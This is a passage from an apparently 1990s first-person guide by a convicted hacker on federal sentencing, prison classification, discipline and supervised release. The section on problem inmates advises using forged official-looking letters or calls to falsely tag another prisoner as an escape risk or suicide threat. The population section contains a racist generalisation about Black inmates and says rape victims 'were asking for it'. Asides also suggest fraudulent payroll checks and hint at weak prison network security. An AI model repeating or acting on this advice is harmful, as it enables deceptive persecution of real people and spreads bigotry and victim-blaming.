are incarcerated. The Bureau of Prisons uses the PSR to decide how to&lt;br /&gt;
handle you. This can affect your security level, your halfway house, your&lt;br /&gt;
eligibility for the drug program (which gives you a year off your sentence)&lt;br /&gt;
,and your medical care. So make sure your PSR is accurate before you get&lt;br /&gt;
sentenced!&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; P. GETTING YOUR PROPERTY BACK&lt;br /&gt;
&lt;br /&gt;
In most cases it will be necessary to formally ask the court to have your&lt;br /&gt;
property returned. They are not going to just call you up and say "Do you&lt;br /&gt;
want this Sparc Station back or what?" No, they would just as soon keep it&lt;br /&gt;
and not asking for it is as good as telling them they can have it.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
You will need to file a 41(e) "Motion For Return Of Property." The courts'&lt;br /&gt;
authority to keep your stuff is not always clear and will have to be taken&lt;br /&gt;
on a case-by-case basis. They may not care and the judge will simply order&lt;br /&gt;
that it be returned.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
If you don't know how to write a motion, just send a formal letter to the&lt;br /&gt;
judge asking for it back. Tell him you need it for your job. This should&lt;br /&gt;
suffice, but there may be a filing fee.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; Q. OUTSTANDING WARRANTS&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
If you have an outstanding warrant or charges pending in another&lt;br /&gt;
jurisdiction you would be wise to deal with them as soon as possible&lt;br /&gt;
-after- you are sentenced. If you follow the correct procedure chances are&lt;br /&gt;
good the warrants will be dropped (quashed). In the worst case scenario,&lt;br /&gt;
you will be transported to the appropriate jurisdiction, plead guilty and&lt;br /&gt;
have your "time run concurrent." Typically in non-violent crimes you can&lt;br /&gt;
serve several sentences all at the same time. Many Federal inmates have&lt;br /&gt;
their state time run with their Federal time. In a nutshell: concurrent is&lt;br /&gt;
good, consecutive bad.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
This procedure is referred to as the Interstate Agreement On Detainers Act&lt;br /&gt;
(IADA). You may also file a "demand for speedy trial", with the appropriate&lt;br /&gt;
court. This starts the meter running. If they don't extradite you within a&lt;br /&gt;
certain period of time , the charges will have to be dropped. The "Inmates'&lt;br /&gt;
Self-Help Litigation Manual" that I mentioned earlier covers this topic&lt;br /&gt;
quite well.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp; R. ENCRYPTION&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
There are probably a few of you out there saying, "I triple DES encrypt my&lt;br /&gt;
hard drive and 128 character RSA public key it for safety." Well, that's&lt;br /&gt;
just great, but... the Feds can have a grand jury subpoena your passwords&lt;br /&gt;
and if you don't give them up you may be charged with obstruction of&lt;br /&gt;
justice. Of course who's to say otherwise if you forgot your password in&lt;br /&gt;
all the excitement of getting arrested. I think I heard this once or twice&lt;br /&gt;
before in a Senate Sub-committee hearing. "Senator, I have no recollection&lt;br /&gt;
of the aforementioned events at this time." But seriously, strong&lt;br /&gt;
encryption is great. However, it would be foolish to rely on it. If the&lt;br /&gt;
Feds have your computer and access to your encryption software itself, it&lt;br /&gt;
is likely they could break it gi ven the motivation. If you understand the&lt;br /&gt;
true art of code breaking you should understand this. People often overlook&lt;br /&gt;
the fact that your password, the one you use to access your encryption&lt;br /&gt;
program, is typically less than 8 characters long. By attacking the access&lt;br /&gt;
to your encryption program with a keyboard emulation sequencer your triple&lt;br /&gt;
DES/128 bit RSA crypto is worthless. Just remember, encryption may not&lt;br /&gt;
protect you.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; S. LEGAL SUMMARY&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Before I move on to the Life in Prison subpart, let me tell you what this&lt;br /&gt;
all means. You're going to get busted, lose everything you own, not get out&lt;br /&gt;
on bail, snitch on your enemies, get even more time than you expected and&lt;br /&gt;
have to put up with a bu nch of idiots in prison. Sound fun? Keep hacking.&lt;br /&gt;
And, if possible, work on those sensitive .gov sites. That way they can&lt;br /&gt;
hang an espionage rap on you. That will carry about 12 to 18 years for a&lt;br /&gt;
first time offender.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
I know this may all sound a bit bleak, but the stakes for hackers have gone&lt;br /&gt;
up and you need to know what they are. Let's take a look at some recent&lt;br /&gt;
sentences:&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; Agent Steal (me) 41 months&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; Kevin Poulsen 51 months&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; Minor Threat 70 months&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; Kevin Mitnick estimated 7-9 years&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
As you can see, the Feds are giving out some time now. If you are young, a&lt;br /&gt;
first-time offender, unsophisticated (like MOD), and were just looking&lt;br /&gt;
around in some little company's database, you might get probation. But&lt;br /&gt;
chances are that if that is all you were doing, you would have been passed&lt;br /&gt;
over for prosecution. As a rule, the Feds won't take the case unless&lt;br /&gt;
$10,000 in damages are involved. The problem is who is to say what the loss&lt;br /&gt;
is? The company can say whatever figure it likes and it would be t ough to&lt;br /&gt;
prove otherwise. They may decide to, for insurance purposes, blame some&lt;br /&gt;
huge downtime expense on you. I can hear it now, "When we detected the&lt;br /&gt;
intruder, we promptly took our system off-line. It took us two weeks to&lt;br /&gt;
bring it up again for a loss in wasted manpower of $2 million." In some&lt;br /&gt;
&lt;br /&gt;
ases you might be better off just using the company's payroll system to&lt;br /&gt;
cut you a couple of $10,000 checks. That way the government has a firm loss&lt;br /&gt;
figure. This would result in a much shorter sentence. I'm not advocating&lt;br /&gt;
blatant criminal actions. I just think the sentencing guidelines definitely&lt;br /&gt;
need some work.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; PART II - FEDERAL PRISON&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; A. STATE v. FEDERAL&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
In most cases I would say that doing time in a Federal Prison is better&lt;br /&gt;
than doing time in the state institutions. Some state prisons are such&lt;br /&gt;
violent and pathetic places that it's worth doing a little more time in the&lt;br /&gt;
Federal system. This is going to be changing however. The public seems to&lt;br /&gt;
think that prisons are too comfortable and as a result Congress has passed&lt;br /&gt;
a few bills to toughen things up.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Federal prisons are generally going to be somewhat less crowded, cleaner,&lt;br /&gt;
and more laid back. The prison I was at looked a lot like a college campus&lt;br /&gt;
with plenty of grass and trees, rolling hills, and stucco buildings. I&lt;br /&gt;
spent most of my time in the library hanging out with Minor Threat. We&lt;br /&gt;
would argue over who was more elite. "My sentence was longer," he would&lt;br /&gt;
argue. "I was in more books and newspapers," I would rebut. (humor)&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Exceptions to the Fed is better rule would be states that permit&lt;br /&gt;
televisions and word processors in your cell. As I sit here just prior to&lt;br /&gt;
release scribbling this article with pen and paper I yearn for even a Smith&lt;br /&gt;
Corona with one line display. The states have varying privileges. You could&lt;br /&gt;
wind up someplace where everything gets stolen from you. There are also&lt;br /&gt;
states that are abolishing parole, thus taking away the ability to get out&lt;br /&gt;
early with good behavior. That is what the Feds did.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; B. SECURITY LEVELS&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The Bureau of Prisons (BOP) has six security levels. Prisons are assigned a&lt;br /&gt;
security level and only prisoners with the appropriate ratings are housed&lt;br /&gt;
there. Often the BOP will have two or three facilities at one location.&lt;br /&gt;
Still, they are essentially separate prisons, divided by fences.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The lowest level facility is called a minimum, a camp, or FPC. Generally&lt;br /&gt;
speaking, you will find first time, non-violent offenders with less than 10&lt;br /&gt;
year sentences there. Camps have no fences. Your work assignment at a camp&lt;br /&gt;
is usually off the prison grounds at a nearby military base. Other times&lt;br /&gt;
camps operate as support for other nearby prisons.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The next level up is a low Federal Correctional Institution (FCI). These&lt;br /&gt;
are where you find a lot of people who should be in a camp but for some&lt;br /&gt;
technical reason didn't qualify. There is a double fence with razor wire&lt;br /&gt;
surrounding it. Again you will find mostly non-violent types here. You&lt;br /&gt;
would really have to piss someone off before they would take a swing at you.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Moving up again we get to medium and high FCI's which are often combined.&lt;br /&gt;
More razor wire, more guards, restricted movement and a rougher crowd. It's&lt;br /&gt;
also common to find people with 20 or 30+ year sentences. Fighting is much&lt;br /&gt;
more common. Keep to yourself, however, and people generally leave you&lt;br /&gt;
alone. Killings are not too terribly common. With a prison population of&lt;br /&gt;
1500-2000, about one or two a year leave on a stretcher and don't come back.&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
The United States Penatentury (U.S.P.) is where you find the murderers,&lt;br /&gt;
rapists, spies and the roughest gang bangers. "Leavenworth" and "Atlanta"&lt;br /&gt;
are the most infamous of these joints. Traditionally surrounded by a 40&lt;br /&gt;
foot brick wall, they take on an ominous appearance. The murder rate per&lt;br /&gt;
prison averages about 30 per year with well over 250 stabbings.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The highest security level in the system is Max, sometimes referred to as&lt;br /&gt;
"Supermax." Max custody inmates are locked down all the time. Your mail is&lt;br /&gt;
shown to you over a TV screen in your cell. The shower is on wheels and it&lt;br /&gt;
comes to your door. You rarely see other humans and if you do leave your&lt;br /&gt;
cell you will be handcuffed and have at least a three guard escort. Mr.&lt;br /&gt;
Gotti, the Mafia boss, remains in Supermax. So does Aldridge Ames, the spy.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; C. GETTING DESIGNATED&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Once you are sentenced, the BOP has to figure out what they want to do with&lt;br /&gt;
you. There is a manual called the "Custody and Classification Manual" that&lt;br /&gt;
they are supposed to follow. It is publicly available through the Freedom&lt;br /&gt;
of Information Act and it is also in most prison law libraries.&lt;br /&gt;
Unfortunately, it can be interpreted a number of different ways. As a&lt;br /&gt;
result, most prison officials responsible for classifying you do pretty&lt;br /&gt;
much as they please.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Your first classification is done by the Region Designator at BOP Regional&lt;br /&gt;
Headquarters. As a computer hacker you will most likely be placed in a camp&lt;br /&gt;
or a low FCI. This is assuming you weren't pulling bank jobs on the side.&lt;br /&gt;
-IF- you do wind up in an FCI, you should make it to a camp after six&lt;br /&gt;
months. This is assuming you behave yourself.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Another thing the Region Designator will do is to place a "Computer No" on&lt;br /&gt;
your file. This means you will not be allowed to operate a computer at your&lt;br /&gt;
prison work assignment. In my case I wasn't allowed to be within 10 feet of&lt;br /&gt;
one. It was explained to me that they didn't even want me to know the types&lt;br /&gt;
of software they were running. Incidentally, the BOP uses PC/Server based&lt;br /&gt;
LANs with NetWare 4.1 running on Fiber 10baseT Ethernet connections to&lt;br /&gt;
Cabletron switches and hubs. PC based gateways reside a t every prison. The&lt;br /&gt;
connection to the IBM mainframe (Sentry) is done through leased lines via&lt;br /&gt;
Sprintnet's Frame Relay service with 3270 emulation software/hardware&lt;br /&gt;
resident on the local servers. Sentry resides in Washington, D.C. with SNA&lt;br /&gt;
type network con centrators at the regional offices. ;-) And I picked all&lt;br /&gt;
of this up without even trying to. Needless to say, BOP computer security&lt;br /&gt;
is very lax. Many of their publicly available "Program Statements" contain&lt;br /&gt;
specific information on how to use Sentry and wha t it's designed to do.&lt;br /&gt;
They have other networks as well, but this is not a tutorial on how to hack&lt;br /&gt;
the BOP. I'll save that for if they ever really piss me off. (humor)&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Not surprisingly, the BOP is very paranoid about computer hackers. I went&lt;br /&gt;
out of my way not to be interested in their systems or to receive computer&lt;br /&gt;
security related mail. Nevertheless, they tried restricting my mail on&lt;br /&gt;
numerous occasions. After I filed numerous grievances and had a meeting&lt;br /&gt;
with the warden, they decided I was probably going to behave myself. My 20&lt;br /&gt;
or so magazine subscriptions were permitted to come in, after a special&lt;br /&gt;
screening. Despite all of that I still had occasional problems, usually&lt;br /&gt;
when I received something esoteric in nature. It's my understanding,&lt;br /&gt;
however, that many hackers at other prisons have not been as fortunate as I&lt;br /&gt;
was.&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; D. IGNORANT INMATES&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
You will meet some of the stupidest people on the planet in prison. I&lt;br /&gt;
suppose that is why they are there, too dumb to do anything except crime.&lt;br /&gt;
And for some strange reason these uneducated low class common thieves think&lt;br /&gt;
they deserve your respect. In fact they will often demand it. These are the&lt;br /&gt;
same people that condemn everyone who cooperated, while at the same time&lt;br /&gt;
feel it is fine to break into your house or rob a store at gunpoint. These&lt;br /&gt;
are the types of inmates you will be incarcerated with, an d occasionally&lt;br /&gt;
these inmates will try to get over on you. They will do this for no reason&lt;br /&gt;
other than the fact you are an easy mark.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
There are a few tricks hackers can do to protect themselves in prison. The&lt;br /&gt;
key to your success is acting before the problem escalates. It is also&lt;br /&gt;
important to have someone outside (preferably another hacker) that can do&lt;br /&gt;
some social engineering for you. The objective is simply to have your&lt;br /&gt;
problem inmate moved to another institution. I don't want to give away my&lt;br /&gt;
methods but if staff believes that an inmate is going to cause trouble, or&lt;br /&gt;
if they believe his life is in danger, they will move him or loc k him away&lt;br /&gt;
in segregation. Social engineered letters (official looking) or phone calls&lt;br /&gt;
from the right source to the right department will often evoke brisk&lt;br /&gt;
action. It's also quite simple to make an inmates life quite miserable. If&lt;br /&gt;
the BOP has reason to be lieve that an inmate is an escape risk, a suicide&lt;br /&gt;
threat, or had pending charges, they will handle them much differently.&lt;br /&gt;
Tacking these labels on an inmate would be a real nasty trick. I have a&lt;br /&gt;
saying: "Hackers usually have the last word in arguments." In deed.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Chances are you won't have many troubles in prison. This especially applies&lt;br /&gt;
if you go to a camp, mind your own business, and watch your mouth.&lt;br /&gt;
Nevertheless, I've covered all of this in the event you find yourself&lt;br /&gt;
caught up in the ignorant behavior of inmates whose lives revolve around&lt;br /&gt;
prison. And one last piece of advice, don't make threats, truly stupid&lt;br /&gt;
people are too stupid to fear anything, particularly an intelligent man.&lt;br /&gt;
Just do it.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; E. POPULATION&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
The distribution of blacks, whites and Hispanics varies from institution to&lt;br /&gt;
institution. Overall it works out to roughly 30% white, 30% Hispanic and&lt;br /&gt;
30% black. The remaining 10% are various other races. Some joints have a&lt;br /&gt;
high percent of blacks and vice versa. I'm not necessarily a prejudiced&lt;br /&gt;
person, but prisons where blacks are in majority are a nightmare. Acting&lt;br /&gt;
loud, disrespectful, and trying to run the place is par for the course.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
In terms of crimes, 60% of the Federal inmate population are incarcerated&lt;br /&gt;
for drug related crimes. The next most common would be bank robbery&lt;br /&gt;
(usually for quick drug money), then various white collar crimes. The&lt;br /&gt;
Federal prison population has changed over the years. It used to be a place&lt;br /&gt;
for the criminal elite. The tough drug laws have changed all of that.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Just to quell the rumors, I'm going to cover the topic of prison rape.&lt;br /&gt;
Quite simply, in medium and low security level Federal prisons it is&lt;br /&gt;
unheard of. In the highs it rarely happens. When it does happen, one could&lt;br /&gt;
argue that the victim was asking for it. I heard an inmate say once, "You&lt;br /&gt;
can't make no inmate suck cock that don't wanta." Indeed. In my 41 months&lt;br /&gt;
of incarceration, I never felt in any danger. I would occasionally have&lt;br /&gt;
inmates that would subtly ask me questions to see where my preferences lie,&lt;br /&gt;
but once I made it clear that I didn't swing that way I would be left&lt;br /&gt;
alone. Hell, I got hit on more often when I was hanging out in Hollywood!&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
On the other hand, state prisons can be a hostile environment for rape and&lt;br /&gt;
fighting in general. Many of us heard how Bernie S. got beat up over use of&lt;br /&gt;
the phone. Indeed, I had to get busy a couple of times. Most prison&lt;br /&gt;
arguments occur over three simple things: the phone, the TV and&lt;br /&gt;
money/drugs. If you want to stay out of trouble in a state prison, or&lt;br /&gt;
Federal for that matter, don't use the phone too long, don't change the&lt;br /&gt;
channel and don't get involved in gambling or drugs. As far as rape goes,&lt;br /&gt;
pick your friends carefully and stick with them. And always, always, be&lt;br /&gt;
respectful. Even if the guy is a fucking idiot (and most inmates are), say&lt;br /&gt;
excuse me.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
My final piece of prison etiquette advice would be to never take your&lt;br /&gt;
inmate problems to "the man" (prison staff). Despite the fact that most&lt;br /&gt;
everyone in prison snitched on their co-defendants at trial, there is no&lt;br /&gt;
excuse for being a prison rat. Th e rules are set by the prisoners&lt;br /&gt;
themselves. If someone steps out of line there will likely be another&lt;br /&gt;
inmate who will be happy to knock him back. In some prisons inmates are so&lt;br /&gt;
afraid of being labeled a rat that they refuse to be seen talking alone&lt;br /&gt;
with a prison staff member. I should close this paragraph by stating that&lt;br /&gt;
this bit of etiquette is routinely ignored as other inmates will snitch on&lt;br /&gt;
you for any reason whatsoever. Prison is a strange environment.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp; F. DOING TIME&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
You can make what you want to out of prison. Some people sit around and do &lt;br /&gt;
dope all day. Others immerse themselves in a routine of work and exercise. &lt;br /&gt;
I studied technology and music. Regardless, prisons are no longer a place&lt;br /&gt;
of rehabilitation. They serve only to punish and conditions are only going&lt;br /&gt;
to worsen. The effect is that angry, uneducated, and unproductive inmates&lt;br /&gt;
are being released back into society.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
While I was incarcerated in 95/96, the prison band program was still in&lt;br /&gt;
operation. I played drums for two different prison bands. It really helped&lt;br /&gt;
pass the time and when I get out I will continue with my career in music.&lt;br /&gt;
Now the program has been canceled, all because some senator wanted to be&lt;br /&gt;
seen as being tough on crime. Bills were passed in Congress. The cable TV&lt;br /&gt;
is gone, pornography mags are no longer permitted, and the weight piles are&lt;br /&gt;
being removed. All this means is that prisoners will have m ore spare time&lt;br /&gt;
on their hands, and so more guards will have to be hired to watch the&lt;br /&gt;
prisoners. I don't want to get started on this subject. Essentially what&lt;br /&gt;
I'm saying is make something out of your time. Study, get into a routine&lt;br /&gt;
and before you know &lt;br /&gt;
you 'll be going home, and a better person on top of it.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; G. DISCIPLINARY ACTIONS&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
What fun is it if you go to prison and don't get into some mischief? Well,&lt;br /&gt;
I'm happy to say the only "shots" (violations) I ever received were for&lt;br /&gt;
having a friend place a call with his three-way calling for me (you can't&lt;br /&gt;
call everyone collect), and drinking homemade wine. |-) The prison&lt;br /&gt;
occasionally monitors your phone calls and on the seven or eight hundredth&lt;br /&gt;
time I made a three-way I got caught. My punishment was ten hours of extra&lt;br /&gt;
duty (cleaning up). Other punishments for shots include loss of phone use,&lt;br /&gt;
loss of commissary, loss of visits, and getting thrown in the hole. Shots&lt;br /&gt;
can also increase your security level and can get you transferred to a&lt;br /&gt;
higher level institution. If you find yourself having trouble in this area&lt;br /&gt;
you may want to pick up t he book, "How to win prison disciplinary&lt;br /&gt;
hearings", by Alan Parmelee, 206-328-2875.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; H. ADMINISTRATIVE REMEDY&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
If you have a disagreement with the way staff is handling your case (and&lt;br /&gt;
you will) or another complaint, there is an administrative remedy&lt;br /&gt;
procedure. First you must try to resolve it informally. Then you can file a&lt;br /&gt;
form BP-9. The BP-9 goes to the warden. After that you can file a BP-10&lt;br /&gt;
which goes to the region. Finally, a BP-11 goes to the National BOP&lt;br /&gt;
Headquarters (Central Office). The whole procedure is a joke and takes&lt;br /&gt;
about six months to complete. Delay and conquer is the BOP motto. After you&lt;br /&gt;
c omplete the remedy process to no avail, you may file your action in a&lt;br /&gt;
civil court. In some extreme cases you may take your case directly to the&lt;br /&gt;
courts without exhausting the remedy process. Again, the "Prisoners&lt;br /&gt;
Self-Help Litigation Manual" covers this qu ite well.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
My best advice with this remedy nonsense is to keep your request brief,&lt;br /&gt;
clear, concise and only ask for one specific thing per form. Usually if you&lt;br /&gt;
"got it coming" you will get it. If you don't, or if the BOP can find any&lt;br /&gt;
reason to deny your request, they will.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
For this reason I often took my problems outside the prison from the start.&lt;br /&gt;
If it was a substantial enough issue I would inform the media, the director&lt;br /&gt;
of the BOP, all three of my attorneys, my judge and the ACLU. Often this&lt;br /&gt;
worked. It always pisse d them off. But, alas I'm a man of principle and if&lt;br /&gt;
you deprive me of my rights I'm going to raise hell. In the past I might&lt;br /&gt;
have resorted to hacker tactics, like disrupting the BOP's entire&lt;br /&gt;
communication system bringing it crashing down! But...I'm rehabilitated&lt;br /&gt;
now. Incidently, most BOP officials and inmates have no concept of the kind&lt;br /&gt;
of havoc a hacker can wield on an individuals life. So until some hacker&lt;br /&gt;
shows the BOP which end is up you will have to accept the fact most&lt;br /&gt;
everyone you meet in prison will have only nominal respect for you. Deal&lt;br /&gt;
with it, you're not in cyberspace anymore.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; I. PRISON OFFICIALS&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
There are two types, dumb and dumber. I've had respect for several but I've&lt;br /&gt;
never met one that impressed me as being particularly talented in a way&lt;br /&gt;
other than following orders. Typically you will find staff that are either&lt;br /&gt;
just doing their job, or staff that is determined to advance their career.&lt;br /&gt;
The latter take their jobs and themselves way too seriously. They don't get&lt;br /&gt;
anywhere by being nice to inmates so they are often quite curt. Ex-military&lt;br /&gt;
and law enforcement wannabes are commonplace. All in all they're a pain in&lt;br /&gt;
the ass but easy to deal with. Anyone who has ever been down (incarcerated)&lt;br /&gt;
for awhile knows it's best to keep a low profile. If they don't know you by&lt;br /&gt;
name you're in good shape.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
One of the problems that computer hackers will encounter with prison staff&lt;br /&gt;
is fear and/or resentment. If you are a pretentious articulate educated&lt;br /&gt;
white boy like myself you would be wise to act a little stupid. These&lt;br /&gt;
people don't want to respect yo u and some of them will hate everything&lt;br /&gt;
that you stand for. Many dislike all inmates to begin with. And the concept&lt;br /&gt;
of you someday having a great job and being successful bothers them. It's&lt;br /&gt;
all a rather bizarre environment where everyone seems to hate the ir jobs.&lt;br /&gt;
I guess I've led a sheltered life.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Before I move on, sometimes there will be certain staff members, like your&lt;br /&gt;
Case Manager, that will have a substantial amount of control over your&lt;br /&gt;
situation. The best way to deal with the person is to stay out of their&lt;br /&gt;
way. Be polite, don't file grievances against them and hope that they will&lt;br /&gt;
take care of you when it comes time. If this doesn't seem to work, then you&lt;br /&gt;
need to be a total pain in the ass and ride them with every possible&lt;br /&gt;
request you can muster. It's especially helpful if you have outsi de people&lt;br /&gt;
willing to make calls. Strong media attention will usually, at the very&lt;br /&gt;
least, make the prison do what they are supposed to do. If you have&lt;br /&gt;
received a lot of bad press, this could be a disadvantage. If you care&lt;br /&gt;
continues to be a problem, the pr ison will transfer you to another&lt;br /&gt;
facility where you are more likely to get a break. All in all how you&lt;br /&gt;
choose to deal with staff is often a difficult decision. My advice is that&lt;br /&gt;
unless you are really getting screwed over or really hate the prison you&lt;br /&gt;
are in, don't rock the boat.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; J. THE HOLE&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Segregation sucks, but chances are you will find yourself there at some&lt;br /&gt;
point and usually for the most ridiculous of reasons. Sometimes you will&lt;br /&gt;
wind up there because of what someone else did. The hole is a 6' x 10'&lt;br /&gt;
concrete room with a steel bed and steel toilet. Your privileges will vary,&lt;br /&gt;
but at first you get nothing but a shower every couple of days. Naturally&lt;br /&gt;
they feed you but, it's never enough, and it's often cold. With no snacks&lt;br /&gt;
you often find yourself quite hungry in-between meals. There is nothing to&lt;br /&gt;
do there except read and hopefully some guard has been kind enough to throw&lt;br /&gt;
you some old novel.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Disciplinary actions will land you in the hole for typically a week or two.&lt;br /&gt;
In some cases you might get stuck there for a month or three. It depends on&lt;br /&gt;
the shot and on the Lieutenant that sent you there. Sometimes people never&lt;br /&gt;
leave the hole....&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; K. GOOD TIME&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
You get 54 days per year off of your sentence for good behavior. If anyone&lt;br /&gt;
tells you that a bill is going to be passed to give 108 days, they are&lt;br /&gt;
lying. 54 days a year works out to 15% and you have to do something&lt;br /&gt;
significant to justify getting that taken away. The BOP has come up with&lt;br /&gt;
the most complicated and ridiculous way to calculate how much good time you&lt;br /&gt;
have earned. They have &lt;br /&gt;
a book about three inches thick that discusses how to calculate your exact&lt;br /&gt;
release date. I studied the book intensely and came to the conclusion that&lt;br /&gt;
the only purpose it serves is to covertly steal a few days of good time&lt;br /&gt;
from you. Go figure.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; L. HALFWAY HOUSE&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
All "eligible" inmates are to serve the last 10% of their sentence (not to&lt;br /&gt;
exceed six months) in a Community Corrections Center (CCC). At the CCC,&lt;br /&gt;
which is nothing more than a large house in a bad part of town, you are to&lt;br /&gt;
find a job in the communit y and spend your evenings and nights at the CCC.&lt;br /&gt;
You have to give 25% of the gross amount of your check to the CCC to pay&lt;br /&gt;
for all of your expenses, unless you are a rare Federal prisoner sentenced&lt;br /&gt;
to serve all of your time at the CCC in which case it is 1 0%. They will&lt;br /&gt;
breathalyse and urinanalyse you routinely to make sure you are not having&lt;br /&gt;
too much fun. If you're a good little hacker you'll get a weekend pass so&lt;br /&gt;
you can stay out all night. Most CCCs will transfer you to home confinement&lt;br /&gt;
status after a few weeks. This means you can move into your own place, (if&lt;br /&gt;
they approve it) but still have to be in for the evenings. They check up on&lt;br /&gt;
you by phone. And no, you are not allowed call forwarding, silly rabbit.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;&amp;nbsp; M. SUPERVISED RELEASE&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Just when you think the fun is all over, after you are released from prison&lt;br /&gt;
or the CCC, you will be required to report to a Probation Officer. For the&lt;br /&gt;
next 3 to 5 years you will be on Supervised Release. The government&lt;br /&gt;
abolished parole, thereby preventing convicts from getting out of prison&lt;br /&gt;
early. Despite this they still want to keep tabs on you for awhile.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Supervised Release, in my opinion, is nothing more than extended&lt;br /&gt;
punishment. You are a not a free man able to travel and work as you please.&lt;br /&gt;
All of your activities will have to be presented to your Probation Officer&lt;br /&gt;
(P.O.). And probation is essentially what Supervised Release is. Your P.O.&lt;br /&gt;
can violate you for any technical violations and send you back to prison&lt;br /&gt;
for several months, or over a year. If you have ANY history of drug use you&lt;br /&gt;
will be required to submit to random (weekly) urinalyses. If you come up&lt;br /&gt;
dirty it's back to the joint.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; &lt;br /&gt;
As a hacker you may find that your access to work with, or possession of&lt;br /&gt;
computer equipment may be restricted. While this may sound pragmatic to the&lt;br /&gt;
public, in practice it serves no other purpose that to punish and limit a&lt;br /&gt;
former hacker's ability t o support himself. With computers at libraries,&lt;br /&gt;
copy shops, schools, and virtually everywhere, it's much like restricting&lt;br /&gt;
